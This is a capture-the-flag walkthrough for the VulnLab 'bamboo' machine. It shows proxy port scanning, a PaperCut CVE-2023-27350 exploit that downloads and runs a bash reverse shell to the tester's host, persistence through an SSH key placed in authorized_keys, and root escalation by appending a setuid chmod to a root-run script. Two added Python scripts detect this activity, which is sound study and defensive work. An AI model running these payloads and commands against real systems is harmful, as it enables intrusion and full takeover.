vulnlab bamboo
nmap scan
# Nmap 7.93 scan initiated Wed Jul 31 08:34:44 2024 as: nmap -Pn -oN bamboo.nmap 10.10.79.83
Nmap scan report for bamboo.vl (10.10.79.83)
Host is up (0.020s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
3128/tcp open  squid-http
# Nmap done at Wed Jul 31 08:34:52 2024 -- 1 IP address (1 host up) scanned in 8.12 seconds
┌──(puck㉿kali)-[~/vulnlab/bamboo/squidscan]
└─$ ./squidscan
Port 22 found!
8916 / 65535 [------->____________________________________________] 13.60% 1659 p/s
Port 9192 found!
Port 9195 found!
Port 9173 found!
Port 9174 found!
9707 / 65535 [------->____________________________________________] 14.81% 1678 p/s
Port 9191 found!
65532 / 65535 [---------------------------------------------------->] 100.00% 0 p/s
modified /etc/proxychains
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
#socks5 127.0.0.1 1080
http 10.10.79.83 3128
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ curl --proxy http://10.10.79.83:3128 http://10.10.79.83:9191 -vv
*   Trying 10.10.79.83:3128...
* Connected to 10.10.79.83 (10.10.79.83) port 3128
> GET http://10.10.79.83:9191/ HTTP/1.1
> Host: 10.10.79.83:9191
> User-Agent: curl/8.8.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
* Request completely sent off
< HTTP/1.1 302 Found
< Date: Wed, 31 Jul 2024 06:40:17 GMT
< Location: http://10.10.79.83:9191/user
< Content-Length: 0
< X-Cache: MISS from bamboo
< X-Cache-Lookup: MISS from bamboo:3128
< Via: 1.1 bamboo (squid/5.2)
< Connection: keep-alive
<
* Connection #0 to host 10.10.79.83 left intact
Exploiting CVE-2023-27350
wget https://raw.githubusercontent.com/horizon3ai/CVE-2023-27350/main/CVE-2023-27350.py
1st
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "curl http://10.8.2.138/s.sh -o /tmp/s.sh"
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
2nd
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ proxychains4 -q python3 CVE-2023-27350.py --url http://10.10.79.83:9191 --command "bash /tmp/s.sh"
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
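Added example (not part of the original walkthrough): both the curl pivot above and the two proxychains exploit runs pass through the squid on 3128, so its access.log is where a defender would see them. The script below flags forwarded requests whose destination is the proxy host itself, loopback, or an internal address, and any request for the SetupCompleted page that CVE-2023-27350 abuses to bypass login; the log lines and the proxy_hosts set are constructed for this example.

```python
import ipaddress
import re

# Squid native access.log: timestamp elapsed client result bytes method url ...
SQUID_RE = re.compile(r"^\d+\.\d+\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+\S+\s+(?P<url>\S+)\s")
# Handles "http://host:port/path" and CONNECT's bare "host:port"
URL_RE = re.compile(r"^(?:[a-z]+://)?(?P<host>[^/:]+)(?::\d+)?(?P<path>/\S*)?$")
# Only the setup wizard requests this page; CVE-2023-27350 hits it on an
# installed server to bypass authentication.
SETUP_COMPLETED = "service=page/SetupCompleted"


def flag_line(line, proxy_hosts):
    """Return every reason one access.log line looks like proxy abuse."""
    m = SQUID_RE.match(line)
    u = URL_RE.match(m["url"]) if m else None
    if not u:
        return []
    reasons, host = [], u["host"]
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # hostname, not resolved here
    if host in proxy_hosts or (ip is not None and ip.is_loopback):
        reasons.append("destination is the proxy host itself (reaches filtered ports)")
    elif ip is not None and ip.is_private:
        reasons.append("destination is an internal (RFC 1918) address")
    if SETUP_COMPLETED in (u["path"] or ""):
        reasons.append("PaperCut SetupCompleted auth-bypass request")
    return reasons


def scan_log(text, proxy_hosts):
    """Return (client, url, reasons) for each flagged line."""
    hits = []
    for line in text.splitlines():
        reasons = flag_line(line, proxy_hosts)
        if reasons:
            m = SQUID_RE.match(line)
            hits.append((m["client"], m["url"], reasons))
    return hits


# Constructed sample lines mirroring the traffic in this walkthrough
SAMPLE_LOG = """\
1722407217.101     12 10.8.2.138 TCP_MISS/302 350 GET http://10.10.79.83:9191/ - HIER_DIRECT/10.10.79.83 -
1722407402.554    230 10.8.2.138 TCP_MISS/200 4210 GET http://10.10.79.83:9191/app?service=page/SetupCompleted - HIER_DIRECT/10.10.79.83 text/html
1722407500.010     40 10.8.2.138 TCP_TUNNEL/200 512 CONNECT 127.0.0.1:9191 - HIER_DIRECT/127.0.0.1 -
1722407600.777     88 10.8.2.138 TCP_MISS/200 9001 GET http://example.com/ - HIER_DIRECT/203.0.113.10 text/html
"""
```

Run `scan_log(SAMPLE_LOG, {"10.10.79.83", "bamboo"})` to see the three flagged lines; the outbound request to example.com is left alone.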
s.sh contains:
#!/bin/bash
sh -i >& /dev/tcp/10.8.2.138/9001 0>&1
catch the shell
┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.79.83] 57168
sh: 0: can't access tty; job control turned off
$ id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
$ hostname
bamboo
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ export TERM=xterm
export TERM=xterm
papercut@bamboo:~/server$
zsh: suspended  rlwrap nc -nlvp 9001

┌──(puck㉿kali)-[~/vulnlab/bamboo]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 9001
papercut@bamboo:~/server$ ls
ls
bin     deployment   lib      reports                     server.uuid
custom  event-store  lib-ext  server.properties           tmp
data    examples     logs     server.properties.template  version.txt
papercut@bamboo:~/server$
Let's add our key to the authorized_keys file to get an SSH shell.
papercut@bamboo:~$ mkdir .ssh
papercut@bamboo:~$ cd .ssh
papercut@bamboo:~/.ssh$ echo 'ssh-rsa AAAAC3N<redacted>QGB= puck@kali' > authorized_keys
papercut@bamboo:~/.ssh$
We now run linpeas and pspy on bamboo, connecting over SSH with the key we just added:
ssh -i papercut papercut@10.10.79.83
privesc
There is an authentication bypass script on Exploit-DB (https://www.exploit-db.com/exploits/51391) for the same CVE we started with.
We run it as follows, and it prints the steps we need to take.
➜  bamboo python3 auth_bypass.py
Enter the ip address: 127.0.0.1
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://127.0.0.1:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://127.0.0.1:9191/app?service=page/Dashboard
The PaperCut NG instance is listening on port 9191, so let's forward that port via SSH:
ssh -i papercut papercut@10.10.79.83 -L 9191:127.0.0.1:9191 -N
Browse to PaperCut.
Click "Refresh servers" to trigger server-command.
papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{fb<redacted>c3}
papercut@bamboo:~$
papercut@bamboo:~/server/bin/linux-x64$ ls
ls
app-monitor                              pc-pdl-to-image
app-monitor.conf                         pc-split-scan
app-server                               pc-udp-redirect
authpam                                  roottasks
authsamba                                sambauserdir
create-client-config-file                server-command
create-ssl-keystore                      setperms
db-tools                                 start-server
direct-print-monitor-config-initializer  stduserdir
gather-ldap-settings                     stop-server
lib                                      upgrade-server-configuration
papercut@bamboo:~/server/bin/linux-x64$ echo 'chmod u+s /bin/bash' >> server-command
echo 'chmod u+s /bin/bash' >> server-command
papercut@bamboo:~/server/bin/linux-x64$
papercut@bamboo:~/server/bin/linux-x64$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
papercut@bamboo:~/server/bin/linux-x64$ bash -p
bash -p
bash-5.1# cd /rocd /root
cd /root
bash-5.1# ls
ls
ls
root.txt  snap
bash-5.1# cat rocat root.txt
cat root.txt
VL{48<redacted>26}
bash-5.1#
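The root cause of the escalation above is a script (server-command) that the papercut service account can modify while a privileged task executes it. As an added audit example (not from the original walkthrough or from PaperCut), the following Python walks an executable directory and reports files a non-root account could rewrite; the sample directory, its file names and modes are constructed for this example, and the trusted_uids parameter is my own convention.

```python
import os
import stat
import tempfile

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH


def audit_exec_dir(directory, trusted_uids=frozenset({0})):
    """Flag files a privileged task could execute but a lesser account could
    rewrite: group/world-writable, owned by an untrusted uid, or kept in a
    directory that is itself writable (the file can simply be replaced).
    Returns a sorted list of (path, reason)."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        dir_writable = bool(os.lstat(root).st_mode & WRITE_BITS)
        for name in files:
            path = os.path.join(root, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks and specials are out of scope here
            if st.st_mode & WRITE_BITS:
                findings.append((path, "group/world-writable"))
            if st.st_uid not in trusted_uids:
                findings.append((path, f"owned by untrusted uid {st.st_uid}"))
            if dir_writable:
                findings.append((path, "parent directory writable: file can be replaced"))
    return sorted(findings)


def build_sample_dir():
    """Constructed stand-in for PaperCut's server/bin/linux-x64 in which
    server-command is writable by the service account's group (mode assumed)."""
    base = tempfile.mkdtemp(prefix="pc-bin-")
    for name, mode in (("server-command", 0o775), ("start-server", 0o755),
                       ("roottasks", 0o755)):
        path = os.path.join(base, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    os.chmod(base, 0o755)
    return base


def run_sample_audit():
    """Audit the sample directory, trusting root and the account running this."""
    return audit_exec_dir(build_sample_dir(), trusted_uids={0, os.getuid()})


if __name__ == "__main__":
    for path, reason in run_sample_audit():
        print(f"{path}: {reason}")
```

Pointing audit_exec_dir at the real server/bin directory, with only root trusted, lists every file a papercut-owned process could turn into a root-executed payload.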
That’s all.